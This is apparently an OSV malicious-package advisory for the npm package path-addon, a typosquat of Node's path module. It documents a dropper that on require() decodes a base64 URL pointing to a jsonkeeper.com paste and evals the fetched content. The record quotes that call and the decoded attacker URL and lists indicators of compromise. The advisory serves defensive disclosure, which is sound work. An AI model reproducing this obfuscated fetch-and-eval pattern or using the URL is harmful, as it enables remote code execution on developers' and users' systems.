MAL-2026-3311
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/path-addon/MAL-2026-3311.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-3311
- Published
- 2026-05-01T07:11:33Z
- Modified
- 2026-06-08T21:31:25.769818341Z
- Summary
- Malicious code in path-addon (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (ba1a7df799b6bd11bd036f1cfb1de6b1dfe0e4e72082be1b8a60537a59e5ae58)
path-addon impersonates the Node.js core
pathmodule (package namepath-addon, README claims to be 'an exact copy of the NodeJS path module'). The body of path.js is the genuine Joyent path implementation, but a remote-code-execution dropper has been inserted: on require(), the module callsfetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9SRlc2SQ=="))— which decodes to https://www.jsonkeeper.com/b/RFW6I, an anonymous mutable JSON paste host — then reads the response'scontentfield and passes it toeval(). The destination URL is base64-encoded specifically to evade casual review and string-based scanners. Any process that imports path-addon executes whatever JavaScript the attacker has placed at that paste URL at the moment of require(), with no integrity check, no pinning, and no version constraint. The combined shape (typosquat name + trojanized legitimate source + obfuscated fetch + eval of remote content at module load) is unambiguous attacker tooling.Source: ossf-package-analysis (4aac3da4c776f814c79af215bfde0f1ee2c3db50e9b18997447f28e9d04df88a)
The OpenSSF Package Analysis project identified 'path-addon' @ 1.0.4 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
- Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-04T03:13:19.749729318Z", "versions": [ "1.0.4" ], "sha256": "4aac3da4c776f814c79af215bfde0f1ee2c3db50e9b18997447f28e9d04df88a", "source": "ossf-package-analysis", "modified_time": "2026-05-01T07:11:33Z" }, { "modified_time": "2026-05-12T06:53:21Z", "versions": [ "1.0.4" ], "sha256": "1f1ee3f4c05bbe24c4113835e304dd3ee650c0a9eee8a4d62046283612827742", "source": "amazon-inspector", "import_time": "2026-05-12T07:28:51.773167504Z" }, { "import_time": "2026-05-26T00:54:40.033890594Z", "versions": [ "1.0.6" ], "sha256": "841010d222011fd6020bd7fc04307bbf20506c3fa1837fb14c4ec50996458a76", "source": "ossf-package-analysis", "modified_time": "2026-05-25T17:27:33Z" }, { "modified_time": "2026-05-25T15:35:01Z", "versions": [ "1.0.5" ], "sha256": "dd3198bde6aa2ea1b04043cb0a16d831667118334a13c759c7097261933457a1", "id": "IN-MAL-2026-004708", "source": "amazon-inspector", "import_time": "2026-05-26T05:53:07.668659711Z" }, { "modified_time": "2026-05-25T15:34:51Z", "versions": [ "1.0.5" ], "sha256": "0e17241453cc8d0c8c3ce06b18aa75eaca0799c9af55e08d406e2c5fed41a695", "id": "IN-MAL-2026-004707", "source": "amazon-inspector", "import_time": "2026-05-26T05:53:07.508831951Z" }, { "import_time": "2026-05-26T05:53:09.369780288Z", "versions": [ "1.0.6" ], "sha256": "11d09848fb828ae851ef7b905f793e3b5876ee2a5ef4b4f8bf06d631ea904d78", "id": "IN-MAL-2026-004721", "source": "amazon-inspector", "modified_time": "2026-05-25T16:22:50Z" }, { "modified_time": "2026-05-25T16:22:55Z", "versions": [ "1.0.6" ], "sha256": "4d7ce32d8902775c2d8d86acb27650f28f454f623487504019f5ee4388f0c8ac", "id": "IN-MAL-2026-004722", "source": "amazon-inspector", "import_time": "2026-05-26T05:53:09.513367294Z" }, { "modified_time": "2026-06-08T20:28:30Z", "versions": [ "1.0.7" ], "sha256": "44f7119799063ff81af4ca2879278aa26f2e56e23a601ef632a65f97d67a0451", "id": "IN-MAL-2026-004935", "source": "amazon-inspector", "import_time": "2026-06-08T21:15:22.230568399Z" }, { "modified_time": "2026-06-08T20:28:29Z", "versions": [ "1.0.7" ], "sha256": "ba1a7df799b6bd11bd036f1cfb1de6b1dfe0e4e72082be1b8a60537a59e5ae58", "id": "IN-MAL-2026-004934", "source": "amazon-inspector", "import_time": "2026-06-08T21:15:22.165466482Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / path-addon
Package
- Name
- path-addon
- View open source insights on deps.dev
- Purl
- pkg:npm/path-addon
Database specific
indicators
{
"domains": [
"www.jsonkeeper.com"
],
"evidence_files": [
{
"sha256": "266311c35a81980e7c59d5d12dcbcc6aaf8b0a4fc5ab082a57586efd13e68baa",
"tlsh": "897296045945654a9a3677b0df0a340ef77688f35315ab00f89ce6502f72e78a2feed8",
"path": "path.js"
},
{
"sha256": "c4c84bbc00493a9ac804f2dabcfd2767e9408ab280a87c12d14c887bfd81bf81",
"tlsh": "2dd0978c0383312761ac4703faa680e28d02e4cd4723100078ce5bf0a2b1da1402610e",
"path": "README.md"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-61gD0Y6RUnuB0mAVP3Xw6IjjjxTjUpWRbK89PzAhVRG60TfTRv8CNc9XLjBEJs+KpE0PWYsbbd+DyzvnQSoHYw==",
"sha1": "e31fdedd8ffeee18b4dfa68129407959c824c723"
},
"filename": "path-addon-1.0.5.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/path-addon/MAL-2026-3311.json"